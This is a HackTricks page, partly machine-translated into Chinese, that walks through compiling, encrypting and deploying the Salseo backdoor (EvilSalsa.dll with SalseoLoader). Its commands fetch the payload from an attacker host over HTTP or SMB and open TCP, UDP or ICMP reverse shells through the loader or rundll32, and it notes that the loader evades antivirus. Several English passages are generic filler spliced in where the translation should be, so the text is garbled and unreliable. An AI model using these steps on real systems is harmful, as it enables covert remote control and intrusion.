hacktricks/backdoors/salseo.md

247 lines
13 KiB
Markdown
Raw Normal View History

2022-08-04 20:47:35 +00:00
# Salseo
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
* 你在一家**网络安全公司**工作吗想要在HackTricks中**宣传你的公司**吗?或者你想要**获取PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
2023-08-03 19:12:22 +00:00
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks的衣物**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
2023-08-03 19:12:22 +00:00
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
2022-04-28 16:01:33 +00:00
</details>
2023-08-03 19:12:22 +00:00
## 编译二进制文件
2023-08-03 19:12:22 +00:00
从github下载源代码并编译**EvilSalsa**和**SalseoLoader**。你需要安装**Visual Studio**来编译代码。
2023-08-03 19:12:22 +00:00
将这些项目编译为你将要使用它们的Windows系统的架构如果Windows支持x64则编译为该架构
2023-08-03 19:12:22 +00:00
你可以在Visual Studio中的**左侧"Build"选项卡**中选择架构,在**"Platform Target"**中。
2023-08-03 19:12:22 +00:00
(\*\*如果你找不到这些选项,请点击**"Project Tab"**,然后点击**"\<Project Name> Properties"**)
2022-08-10 14:32:58 +00:00
![](<../.gitbook/assets/image (132).png>)
2023-08-03 19:12:22 +00:00
然后构建这两个项目Build -> Build Solution在日志中将显示可执行文件的路径
2022-09-27 00:14:52 +00:00
![](<../.gitbook/assets/image (1) (2) (1) (1) (1).png>)
2023-08-03 19:12:22 +00:00
## 准备后门
首先,你需要对**EvilSalsa.dll**进行编码。你可以使用python脚本**encrypterassembly.py**或者编译项目**EncrypterAssembly**来进行编码:
2022-08-04 20:47:35 +00:00
### **Python**
```
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
2022-08-04 20:47:35 +00:00
### Windows
#### Salseo Backdoor
2023-08-03 19:12:22 +00:00
The Salseo backdoor is a type of malware that provides unauthorized access to a compromised Windows system. It is designed to remain hidden and undetected, allowing an attacker to maintain persistent control over the infected machine.
2023-08-03 19:12:22 +00:00
##### Functionality
2023-08-03 19:12:22 +00:00
Once installed on a target system, the Salseo backdoor establishes a covert communication channel with a remote command and control (C2) server. This allows the attacker to remotely execute commands on the compromised machine and retrieve sensitive information.
2023-08-03 19:12:22 +00:00
The backdoor is capable of performing various malicious activities, including:
2023-08-03 19:12:22 +00:00
1. **Remote Access**: The attacker can gain full control over the infected system, enabling them to perform actions as if they were physically present.
2023-08-03 19:12:22 +00:00
2. **Data Exfiltration**: The backdoor can steal sensitive data from the compromised machine, such as login credentials, financial information, or intellectual property.
2023-08-03 19:12:22 +00:00
3. **Keylogging**: Salseo can capture keystrokes, allowing the attacker to monitor and record user activities, including passwords and other confidential information.
2023-08-03 19:12:22 +00:00
4. **File Manipulation**: The backdoor can create, modify, or delete files on the compromised system, giving the attacker the ability to plant additional malware or tamper with existing files.
2023-08-03 19:12:22 +00:00
5. **System Surveillance**: Salseo can gather system information, such as installed software, hardware details, and network configurations, providing the attacker with valuable insights for further exploitation.
2023-08-03 19:12:22 +00:00
##### Infection Vectors
2023-08-03 19:12:22 +00:00
The Salseo backdoor can be delivered through various infection vectors, including:
2023-08-03 19:12:22 +00:00
1. **Phishing Emails**: Malicious attachments or links in phishing emails can lead to the installation of the backdoor when clicked or opened.
2023-08-03 19:12:22 +00:00
2. **Drive-by Downloads**: Visiting compromised or malicious websites can trigger the automatic download and execution of the backdoor without the user's knowledge.
3. **Exploit Kits**: Salseo can be delivered through exploit kits that target vulnerabilities in outdated software or plugins, allowing the attacker to gain unauthorized access.
4. **Malicious Downloads**: Users may unknowingly download and execute the backdoor when interacting with malicious files or software from untrusted sources.
##### Detection and Prevention
Detecting and preventing the Salseo backdoor requires a multi-layered approach, including:
1. **Antivirus Software**: Regularly update and use reputable antivirus software to detect and remove known malware signatures associated with Salseo.
2. **Patch Management**: Keep operating systems, software, and plugins up to date to mitigate vulnerabilities that could be exploited by the backdoor.
3. **User Education**: Train users to recognize and avoid phishing emails, suspicious websites, and downloads from untrusted sources.
4. **Network Monitoring**: Implement network monitoring tools to detect unusual traffic patterns or connections to known malicious C2 servers.
5. **Firewall Configuration**: Configure firewalls to block unauthorized inbound and outbound connections, limiting the backdoor's ability to communicate with the C2 server.
By implementing these preventive measures and maintaining a proactive security posture, organizations can reduce the risk of falling victim to the Salseo backdoor and other similar malware.
```
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
2023-08-03 19:12:22 +00:00
好的现在你已经拥有执行所有Salseo操作所需的一切**编码的EvilDalsa.dll**和**SalseoLoader的二进制文件**。
2023-08-03 19:12:22 +00:00
**将SalseoLoader.exe二进制文件上传到目标机器。它们不应该被任何杀毒软件检测到...**
2023-08-03 19:12:22 +00:00
## **执行后门**
2023-08-03 19:12:22 +00:00
### **获取TCP反向Shell通过HTTP下载编码的dll**
2023-08-03 19:12:22 +00:00
记得启动一个nc作为反向Shell监听器并启动一个HTTP服务器来提供编码的evilsalsa。
```
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
```
### **获取UDP反向shell通过SMB下载编码的dll**
记得启动一个nc作为反向shell监听器并启动一个SMB服务器来提供编码的evilsalsaimpacket-smbserver
```
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
```
2023-08-03 19:12:22 +00:00
### **获取ICMP反向shell已在受害者内部编码的dll**
2023-08-03 19:12:22 +00:00
**这次你需要在客户端上使用一个特殊工具来接收反向shell。下载** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
2023-08-03 19:12:22 +00:00
#### **禁用ICMP回复**
```
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
2023-08-03 19:12:22 +00:00
#### 执行客户端:
To execute the client, you need to follow these steps:
1. Make sure you have the client file downloaded and saved on your local machine.
2. Open a terminal or command prompt.
3. Navigate to the directory where the client file is located using the `cd` command.
4. Once you are in the correct directory, run the client file by typing its name followed by the appropriate command. For example, if the client file is named `client.exe`, you would type `client.exe` and press Enter.
5. The client will then execute and start running on your machine.
2023-08-03 19:12:22 +00:00
Remember to exercise caution when executing any files, especially those obtained from untrusted sources. Always scan files for malware before running them.
```
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
```
2023-08-03 19:12:22 +00:00
#### 在受害者内部让我们执行salseo操作
```
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
```
2023-08-03 19:12:22 +00:00
## 将SalseoLoader编译为导出主函数的DLL
2023-08-03 19:12:22 +00:00
使用Visual Studio打开SalseoLoader项目。
在主函数之前添加\[DllExport]。
![](<../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png>)
为该项目安装DllExport。
选择**工具** --> **NuGet程序包管理器** --> **管理解决方案的NuGet程序包...**
![](<../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png>)
在浏览选项卡中搜索DllExport程序包并点击安装接受弹出窗口
![](<../.gitbook/assets/image (4) (1) (1) (1) (1).png>)
在项目文件夹中会出现**DllExport.bat**和**DllExport_Configure.bat**文件。
卸载DllExport。
点击**卸载**(是的,很奇怪,但相信我,这是必要的)。
![](<../.gitbook/assets/image (5) (1) (1) (2) (1).png>)
退出Visual Studio并执行DllExport_Configure。
只需退出Visual Studio然后转到您的SalseoLoader文件夹并执行DllExport_Configure.bat。
选择**x64**如果您将在x64系统中使用它这是我的情况选择**System.Runtime.InteropServices**(在**DllExport的命名空间**中)并点击**应用**。
2023-02-27 09:14:27 +00:00
![](<../.gitbook/assets/image (7) (1) (1) (1).png>)
再次使用Visual Studio打开项目。
\[DllExport]不再标记为错误。
![](<../.gitbook/assets/image (8) (1).png>)
构建解决方案。
选择**输出类型=类库**(项目 --> SalseoLoader属性 --> 应用程序 --> 输出类型=类库)。
2022-10-22 15:26:54 +00:00
![](<../.gitbook/assets/image (10) (1).png>)
选择**x64平台**(项目 --> SalseoLoader属性 --> 构建 --> 平台目标=x64
2022-09-02 15:27:38 +00:00
![](<../.gitbook/assets/image (9) (1) (1).png>)
构建解决方案:构建 --> 构建解决方案在输出控制台中将显示新DLL的路径
测试生成的DLL
将DLL复制粘贴到要进行测试的位置。
2023-08-03 19:12:22 +00:00
执行:
```
rundll32.exe SalseoLoader.dll,main
```
2023-08-03 19:12:22 +00:00
如果没有出现错误那么你可能有一个功能正常的DLL
## 使用DLL获取一个shell
2023-08-03 19:12:22 +00:00
不要忘记使用一个**HTTP** **服务器**并设置一个**nc** **监听器**
2022-08-04 20:47:35 +00:00
### Powershell
```
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
2022-08-04 20:47:35 +00:00
### CMD
CMD (Command Prompt) is a command-line interpreter in Windows operating systems. It provides a text-based interface for executing commands and managing the system. CMD can be used to perform various tasks, such as navigating through directories, running programs, and managing files and processes.
2023-08-03 19:12:22 +00:00
CMD is a powerful tool for hackers as it allows them to execute commands and scripts on a target system. By gaining access to CMD, hackers can exploit vulnerabilities, escalate privileges, and gain control over the target system.
2023-08-03 19:12:22 +00:00
To access CMD, simply open the Start menu, type "cmd" in the search bar, and press Enter. This will open the Command Prompt window, where you can start executing commands.
2023-08-03 19:12:22 +00:00
It is important to note that CMD should only be used for legitimate purposes, such as system administration or troubleshooting. Using CMD for malicious activities is illegal and unethical. Always ensure that you have proper authorization before using CMD on a system.
```
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
2022-04-28 16:01:33 +00:00
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
* 你在一家**网络安全公司**工作吗想要在HackTricks中**宣传你的公司**吗?或者你想要**获取PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或者**关注**我在**推特**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
2022-04-28 16:01:33 +00:00
</details>